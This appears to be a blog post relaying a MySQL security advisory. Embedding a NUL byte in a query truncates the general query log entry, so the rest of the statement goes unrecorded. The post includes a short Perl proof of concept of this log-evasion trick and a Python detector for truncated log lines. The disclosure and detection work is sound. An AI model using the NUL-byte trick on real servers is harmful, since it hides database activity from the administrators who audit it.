Security advisory for MySQL: Don't trust your general query log if you don't trust your users
I just stumbled across a recently discovered security issue in MySQL while using the general query log today (it is usually deactivated on our servers) to track down the behaviour of some legacy applications. The upshot: if you grant access to possibly untrusted users, you should not count on the general query log to supervise their activities.
The original security advisory was published one week ago by 1dt.w0lf and also reported as bug #17667.
A user can hide any query from the general query log simply by embedding a NUL character (ASCII 0) in it: the logger treats the NUL as the end of the string and drops everything that follows. A comment containing a NUL character at the beginning of the statement is enough, as in the following proof of concept.
#!/usr/bin/perl
use strict;
use warnings;
use DBI;
# Connection parameters are taken from the [mysql] group of the user's my.cnf
my $db = DBI->connect("DBI:mysql:mysql_read_default_group=mysql");
die($DBI::errstr."\n") unless $db;
# The NUL byte inside the leading comment truncates the general query log entry;
# the SELECT after it is executed but never appears in the log
$db->do("/* This is okay. ".chr(0)." */ SELECT 'This will be hidden from query log'");
$db->disconnect;
This is what affected versions of MySQL (at least all current production releases <= 5.0.18 appear to be vulnerable) write to the general query log; everything from the NUL character onward is stripped:
19321 Connect xxx@localhost on
19321 Query /* This is okay.
19321 Quit
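As an added example (not part of the original post), the following Python models the truncation described above and flags general query log Query lines whose statement ends inside an unclosed comment or quoted string, which is what a NUL-truncated entry typically looks like. The log sample is constructed from the output shown above; the line format assumed is the one the post shows (thread id, command, statement), and the check is per line, so legitimately multi-line statements may need the lines joined first.

```python
import re

# Constructed general query log excerpt: the truncated entry from the post
# plus a normal, fully logged statement for comparison.
SAMPLE_LOG = """\
19321 Connect xxx@localhost on
19321 Query /* This is okay.
19321 Quit
19322 Connect app@localhost on
19322 Query SELECT 'visible' FROM t1 /* closed comment */
19322 Quit
"""

def log_as_written(query: str) -> str:
    """Model of the affected behaviour: the logger handles the statement as a
    C string, so everything from the first NUL byte onward is dropped."""
    nul = query.find("\0")
    return query if nul < 0 else query[:nul]

def looks_truncated(stmt: str) -> bool:
    """Heuristic: a logged statement that ends inside an unclosed /* comment
    or an unclosed quoted string is a candidate for NUL truncation."""
    if stmt.count("/*") > stmt.count("*/"):
        return True
    cleaned = re.sub(r"\\.", "", stmt)  # ignore backslash-escaped quotes
    return cleaned.count("'") % 2 == 1 or cleaned.count('"') % 2 == 1

def find_suspicious_entries(log_text: str) -> list:
    """Return (thread_id, statement) for every Query line that looks truncated.
    re.search tolerates a leading timestamp before the thread id."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r"\b(\d+)\s+Query\s+(.*)$", line)
        if m and looks_truncated(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits

if __name__ == "__main__":
    print(repr(log_as_written("/* This is okay. \0 */ SELECT 'hidden'")))
    for thread_id, stmt in find_suspicious_entries(SAMPLE_LOG):
        print(f"thread {thread_id}: possibly truncated entry: {stmt!r}")
```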
Since only the general query log, and not the binary log, is affected by this issue, it can certainly be considered less critical: every statement that actually manipulates data can still be captured in the binary log or with triggers.